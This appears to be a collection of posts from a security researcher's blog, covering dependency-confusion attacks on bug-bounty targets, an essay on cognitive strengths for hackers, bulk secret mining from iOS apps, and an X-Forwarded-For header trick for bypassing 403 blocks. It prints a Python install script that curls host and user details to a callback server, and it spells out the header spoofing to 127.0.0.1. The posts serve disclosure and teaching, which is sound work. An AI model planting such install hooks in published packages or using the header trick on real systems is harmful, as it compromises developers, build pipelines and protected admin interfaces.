How I hacked into Google’s internal corporate assets

It’s raining command injections! 

Every now and then, I take some time to work on bug bounty projects to explore threat vectors into real world targets like Google, Tesla and many others. Doing so helps me stay aware of the fast-changing technical landscape, which is crucial for my role as a technology CISO. Plus, it’s enjoyable and provides extra income. 

On my most recent venture, I focused on open-source and supply chain attacks. Over the period of a week I discovered multiple vulnerabilities, and gained control of (read: “command injection on”) numerous in-scope bug bounty assets. Gaining command injection essentially means the ability to execute arbitrary commands in an Operating System (ie. MacOS, Linux, etc) and in my case – as root or admin. I was able to run OS commands on over a thousand assets including servers, containers, CI/CD systems & developer machines. Six of these assets were Google’s internal corporate assets, many more belonged to a self-driving car company’s build CI/CD pipeline and others I can’t share the details on. These findings were mostly critical with high impact.

Interestingly, in the case of Google, I received an honourable mention but was not awarded a bounty as the most critical asset I compromised was a developers machine. In contrast, I was awarded a bounty by another company for doing just that.

How?

Today, much of our software relies on “open source software libraries” to handle specific software functions. These libraries – essentially small software packages – are freely available to the public to use, support, and maintain. They play a crucial role in speeding up and simplifying software development.

Many of the applications and software we use every day as consumers (ie. banking apps, government services, social media, etc) heavily depend on these open source libraries, often referred to as “dependencies”. During software development, programming languages such as Python and Node.js fetch these dependencies to build the software. 

Developers are familiar with commands like:

  • npm install <packagename>
  • pip install <packagename>

These dependencies can be sourced internally, from within the organization’s artifact registry, or externally, from a public register. However, a significant issue arises when an external attacker identifies and registers a public package that an organization is exclusively using internally.

In such cases, programming languages like Node.js and Python are programmed to automatically retrieve a public version of the package if no local version is available – or if the public version is higher. If the public version is malicious – this can have immediately severe consequences for the software that is being targeted, any sensitive data associated with the software and for the customers who use the software. What’s more, these types of attacks are really hard to detect when they happen. 

How I discovered vulnerable packages

Despite the fact that pioneers of this bug like Alex Birsan had mopped up Apple, Microsoft, Yelp and many other companies who were vulnerable to this attack, I donned my VC thinking and took a somewhat philosophical view that there were a number of fundamentals at play that when combined, would likely result in me still being able to find and exploit these bugs and thereby secure some return on investment. These fundamentals were;

  1. It is likely that many large organizations are vulnerable to dependency confusion in some way and I still believe this to be true even after my exploits – in fact, more-so now. Although I don’t have evidence, I’ve had enough anecdotal conversations to get the impression that not many tech companies are taking an organized and risk based approach to uplifting the security of their CI/CD pipelines. This is not something that security attestations like SOC2 or ISO27001 cover but it is a critical area of risk for software development.
  2. The perceived typical approaches to solving this problem can involve needlessly imposing cost on developer time or on the actual security budget and this has a deterrent effect on the ability for an engineering org to quickly effect remedial change in this space. In other words, it can sometimes be perceived as “hard” or “slow” to fix, which is not entirely true. Fixing this can be as simple as registering legitimate public packages under the same name, that contain no code, but are designed to secure the namespace so it can’t be taken by others. As an aside, I went to a security conference recently, where a security vendor was selling a tool to solve this exact problem. You don’t need to buy a tool to solve this problem and it reinforced to me that this issue is not well understood by security teams – and that is the second fundamental reason why I figured this particular endeavor worthy of some time and effort. 

Some things I observed while doing discovery:

When orgs build their own internal dependencies, these are typically named something that aligns to an internal service or function that is consumed by multiple services or applications. For example, a company might have an internal dependency called “companyname-regex”. This is significant because the names of these internal dependencies can align to names of publicly available names; names that are contained in functions in externally accessible code or even the names of externally accessible apis or services. Extending on this hypothesis, developers might use names that are associated with core products or features. Because of this, a degree of discovering these in public javascript and/or brute forcing them is possible

For me this is the scariest part because of how significant the potential is to target organizations and scale this attack up. I saw evidence from research from companies like checkmarx who had identified actors (unconfirmed if they were malicious or not) who scaled up attacks (creating hundreds of these dependencies) targeting specific companies through what seemed to be similar bruteforcing activity (guessing the names of internal services, utilities, etc).

So I set out to find some vulnerable dependencies. I did this via a number of methods:

  • Scanned hundreds of public github repositories to identify dependencies that looked like internal dependencies. 
  • Spidered and scanned javascript on websites
  • Scanned public web server directories to reveal endpoints like /package.json. 
  • Downloaded old/archived website javascript and scanned that to find references to old dependencies, old javascript functions that have since been removed in the last 5 years but could be used elsewhere. 

Scanning tools that I used included:

  • Confused – this was used to check whether the dependency was in a public register or not. 
  • Other than this, I wrote all of my other tools and used GenerativeAI to speed the process of script writing up. The code it produced was impressive allowed me to conduct a substantial amount of research at a far greater pace than what I ordinarily would have been able to. 

Scanning techniques included:

  • Searching for dependency files in places like github (ie. package.json, dependencies.txt)
  • Searching for functions within public code on websites that refer to possible dependency names. This included:
    • import(‘dependency_path’)
    • require(‘dependency_path’)
    • define(‘module’)
    • “exports=JSON.parse”
    • References to ‘node_module’ where dependency files are usually saved
  • Using regex to search through javascript looking for potential dependency names
    • (example: grep -Por ‘”.*”:”\^[0-9]+\.[0-9]+\.[0-9]+”‘ |  tr ‘,’ ‘\n’  | awk ‘/”.*”:”\^[0-9]+\.[0-9]+\.[0-9]+”/ {print}’ | sort -u)

How I exploited dependency confusion

Once I had identified a number of externally accessible <potential or confirmed> dependency names, getting a command injection on a server to prove the concept was conceptually straightforward but practically difficult. I won’t explain this much here – other resources exist out there that explain this process in more detail. 

However, in essence, using a curl command in a dependency install script like below – once installed on a target host – grabs some basic information about the host and sends it to a server. 

Bear in mind that for some programs, this is actually out of scope (ie Yelp), but for the vast majority of programs where I’ve seen this, they expect some form of command injection as proof – ‘or it never happened’. Always check the program scope before proceeding.

Example PIP Dependency preinstall script. 

import subprocess

def pre_install():

    curl_command = ‘curl -X -H “Hostname: $(hostname)” -H “Username: $(whoami)” -H “Directory name: $(pwd)” https://my-call-back-server

    subprocess.run(curl_command, shell=True)

if __name__ == “__main__”:

    pre_install()

Some things I observed while doing exploitation:

  • Organizations impacted the most were those running continuous delivery and deployment. It didn’t impact software that had a slower development cycle, this is because with continuous delivery and deployment, artifacts are called regularly and automatically and so risk of compromise within a given timeframe is much more likely. Organizations impacted by this bug are typically going to be medium to larger software companies with larger scalable software architectures like Kubernetes. 
  • This also impacts developers. I’d often have developers installing my packages on their local development machines due to a general lack of awareness or vigilance around open source risks.
  • These packages are not just running software around the world, they are the hidden bedrock of our digital economy. Literally the basis upon which commerce happens around the globe – indeed the provision of modern critical services such as healthcare – many of these things are reliant on open source software in some way. All it takes for a financially motivated criminal or some form of espionage is to drop a well targeted package into a public register and BOOM! a malicious actor could gain control of any number of servers across any number of larger organizations. Because of this, I’d love to see these registers work more closely with the bug bounty community to test evasion & detection techniques for malicious packages. 

How to optimize your hacking by understanding your mind.

Over the course of my career, the limitations and capabilities of the human brain and how these impact the tasks we perform, the choices we make and our long term career trajectory has been a source of great fascination for me.

When solving problems at work we rarely take a step back and consider to what extent our mind is equipped to handle a particular task. Usually we just focus on fixing the problem, not optimising the thing that is fixing the problem.

But the reality is that inside our heads, we are each equipped with a kit that contains its own incredibly unique set of limitations and strengths.

To illustrate the point, we might briefly compare the brain with a car; you don’t drive a racing car up a sand dune or race a four wheel drive against other F1 cars.

The reality is that each of us have a brain that is equipped with a varying set of cognitive abilities. Understanding your cognitive strengths and weaknesses can help improve your ability to perform your work. You can capitalise on your cognitive strengths and you can find ways to mitigate the effect of your cognitive struggle.

So what are some practical examples of this? While I’m going to provide examples which can be applied to all types of work, I’ll use hacking as the practical example.

Let’s start with executive function.

Executive function

Executive function is the cognitive process that helps us to regulate, control and manage our thoughts and actions. It includes a number of cognitive processes, but for the purpose of this post, I want to focus on only three of them.

Each of us have certain strengths and certain struggles with our executive function. These struggles can be amplified significantly for people with ASD or ADHD.

Task Initiation

Task initiation refers to the capacity to begin a task or activity, as well as independently generating ideas, responses or problem solving strategies. People who struggle with initiation typically want to succeed at a task but can’t get started

A great example of this is bug hunting. Hunting for bugs or exploits that allows a hacker to exploit a system is usually something that people do in their spare time, so usually self discipline is needed to sit down and well… start.

I see people all the time who want to get started in bug hunting and despite all the advice out there to just “get started” some people really struggle to just get started. And for some people – those who struggle with task initiation – this is a very real issue. Usually these people are just as smart as anyone else, but the one thing holding them back is cognitive struggle encountered when initiating tasks.

I’ve seen some great initiatives within infosec at a very local level which inadvertently help people who struggle with this. Local study groups who proactively encourage beginners to join in are a great way to bridge this gap.

If on the other hand, you have no trouble initiating a task, then use it to your advantage! start a local meetup. Join an organising committee. Invite a friend who struggles with task initiation to collab with you. Initiate your work and career away.

Planning and organisation

Planning and organisation refers to a person’s ability to to manage current and future-oriented task demands. Planning relates to the ability to anticipate future events, set goals and develop appropriate steps ahead of time to carry out a task or activity. Organisation relates to the ability to bring order to information and to appreciate the main ideas or key concepts when learning and communicating information.

In information security there is an array of roles that require varying levels of organisational and planning ability. Its worth analysing your capacity to plan and organise and then aiming for a role which aligns with your capability in this area.

In the past, I’ve made the mistake of hiring someone who while technically excellent, struggled to manage small projects. They really struggled with their ability to plan and organise. That person was able to thrive much more in an engineering context where they execute to a set of sequential instructions.

As a bug hunter, organising is helpful for reconnaissance and planning is helpful for exploitation. I’ve seen bug hunters do these things at varying levels of complexity. If planning and organisation is a strength or yours, then use it to map out a plan on how to get to your ideal role, or attack your ideal target.

On the flip side, if you struggle in this area and you want to bug-hunt, I think you are in luck – not much planning or organisation is actually needed to discover and exploit bugs.

Working memory

Working memory (not to be confused with short-term memory) is your mental sticky note or sketchpad. It’s a skill that allows us to work with information without losing track of what we’re doing. 

It describes how much working information you can store in your mind at a given time. For example, you might be storing lines of code, exploit strings, heck – even UUIDS or hashes.

How much information you hold in your working memory determines how much of the overall informational picture you can see/process at once.

Struggle with working memory might result in someone struggling to remember their code logic while scripting, or could require someone to reference documented instructions more regularly to compensate for not being able to hold the instructions in working memory.

If you have a bigger working memory, then this is going to be particularly beneficial if you are reverse engineering, doing OSINT or building an exploit.

If you struggle with working memory you might need to consider ways to mitigate the impact of this. For example, you could work on visualisation skills. Visualising the problem requires your brain to store the information differently. Breaking big chunks of information into bite sized pieces also helps to digest information more easily.


While our executive function is made up of many cognitive processes, executive function is just one aspect of how our minds are equipped to handle the problems that we solve each day. There are many other aspects of our minds that are used to solve problems and make decisions and process information.

And the more we learn about our minds, the better equipped we are to solve tasks more efficiently and do our work more effectively.

Do yourself a favour and become more effective at work – doing the hacking or whatever your doing – by identifying your cognitive strengths and weaknesses and how to use these to your advantage.

Related resources

What are cognitive abilities and skills, and can we boost them?

Walking the path least trodden – hacking iOS apps at scale

This is a story of how I set out to find some bounties and how I found gold, hacking iOS apps, at scale.

One of the essentials qualities of a bug hunter is the ability to find exploitable vulnerabilities that others haven’t found.

The ability to find bugs not discovered by others is a quality that comes from – not deep technical knowledge – but rather, creativity and innovation.

So how to get an edge over others? – find the path least trodden.

How to find the path least trodden? be creative: come up with new ways to build footprint/reconnaissance on a target.

In my case, I decided to apply this concept to an area of bug bounties which usually doesn’t get as much attention as web applications: iOS apps.

I also chose iOS apps, because they are closed source, and not straight-forward to hack. I figured, that because hacking iOS apps has a price barrier to entry, as well as messy configuration would mean I would be working on targets which other researchers would be less likely to see. Therefore, it would be a path, least trodden.

So I set out on the task; found an old iPhone, went out and purchased a MacBook, used that to root the iPhone. Then in order to be able to decrypt and download in-scope bug bounty apps, I had to configure a few apps.

After some tinkering, I built an end-to-end workflow, called iGold, which enabled me to hack in-scope iOS apps at scale with little manual involvement.

I wrote the workflow in bash, and it enabled me to perform two key functions:

Use case 1 (on-demand): Whenever I see a new bounty program, I can download the iOS app onto my phone which triggers a process to automatically download, decompile the app, test API key access to database’s etc.

Use case 2 (bulk): Download hundreds of apps from various bounty platform’s at once. As they are downloaded, they are automatically decompiled and tested, en masse.

The script essentially decrypts iOS applications, downloads them, decompiles them, converts plist files, performs some class dumping, run’s strings on the binaries, and then starts grepping this data for specific targets like API keys, URL’s, tokens, and all manner of secrets using regex. The script also tests some API keys.

I compared my script process with some common tools like MobSF, and found that in some cases I was looking for things that MobSF was not searching for.

Because I was able to perform this recon at scale, I was able to discover a number of interesting things – which I’ll break into two categories.

  1. Secrets (as expected) – found a number of API keys which had not been discovered by others.
  2. Valuable recon about organisations which is otherwise hard/impossible to get.

I found point 2 to be of more value.

By way of example, I discovered an iOS app binary which contained an s3 bucket address. I then looked the address up and found it was public. I then identified a very suspicious looking file in this public bucket, but alas, the file was blocked/secured. I knew they had a number of private buckets, so I scanned the same file name against their private bucket and then I got a hit – it downloaded.

On another occasion, I found an s3 bucket address in a binary which contained a file which once downloaded and decompressed contained the administrative credentials to their entire global AWS tennancy.

Oftern less attention is given to securing assets that are harder to find – so find the path least trodden!

Bypassing 403

A few weeks ago I came across this cool “accidental” exploit vector which was documented about 8 years ago by IRCmaxwell and describes a way to trick servers (behind a reverse proxy or load balancer) into thinking a HTTP request which is ordinarily unauthorised, is actually authorised.

I read the blog post while doing some research into the X-Forwarded-For http request header and immediately identified this “accidental exploit” as a really cool use-case for applying to bug bounty targets.

To explain this exploit we need to first understand the purpose of the X-Forwarded-For request header.

The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. When traffic is intercepted between clients and servers, server access logs contain the IP address of the proxy or load balancer only. To see the original IP address of the client, the X-Forwarded-For request header is used.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For

This header is used and implemented in a variety of ways and because of this, it can also be exploited in a variety of ways. Researchers often use this header to inject SQL payloads, perform proxy enumeration, client IP spoofing, SSRF and many other interesting use-cases which I’ll cover later.

However the use-case that really got my attention was a variation of IP spoofing which causes the target web server to reveal information that it shouldn’t. I like to find vulnerabilities that most scanners aren’t configured to find and this I think is another one of these cases.

So IRCMaxwell experienced a situation where he unintentionally configured all of his outgoing http requests to include the X-Forwarded-For header configured with an ip address of 127.0.0.1 (the local host) – you can read his blog to find out how and why.

However this resulted in a situation where he discovered that StackOverflow was revealing parts of an administrative console to him that should not have been available for public viewing or access.

What was happening is that once the StackOverflow server recieved this request, it interpreted the “X-Forwarded-For: 127.0.0.1” to mean that webserver itself had initated the request, and that by implication, the requestor was authorised to see all the content available at that endpoint. IRCMaxwell was effectively masquarading as the webserver itself as far as the webserver was concerned.

I thought this was a pretty cool vulnerablity and so thought about how I could apply this to bug bounty targets.

So I wrote a tool which sends numerous requests to a target address with different variations of the XFF header localhost addressing to accommodate for cases where a WAF was blocking requests based on localhost signatures.

The tool uses heusristics to learn variations in the http response that could be indicative of additional sensitive information that is being disclosed.

As I developed this tool and scanned across hundreds of bug bounty targets I began to discover some interesting nuances. Web applications would handle and respond to XFF input very differently, resulting in some unexpected bug bounty leads.

However, the biggest win came early in the scanning when the tool discovered an admin console on a subdomain that is blocked to the public (response code 403), until you sent it a http request with an XFF header set to 127.0.0.1:80 at which point, the admin console became accessible.

After writing up the report – demonstrating the impact – it occurred to me that the same issue might occur on other subdomains of the parent domains.

After some searching I realised that not one subdomain, but two, no wait… over 800 subdomains for this particular organisation were impacted by the same issue. Each of these subdomains contained web applications, APIs or other services which were normally blocked to public access, but were bypassable using this technique!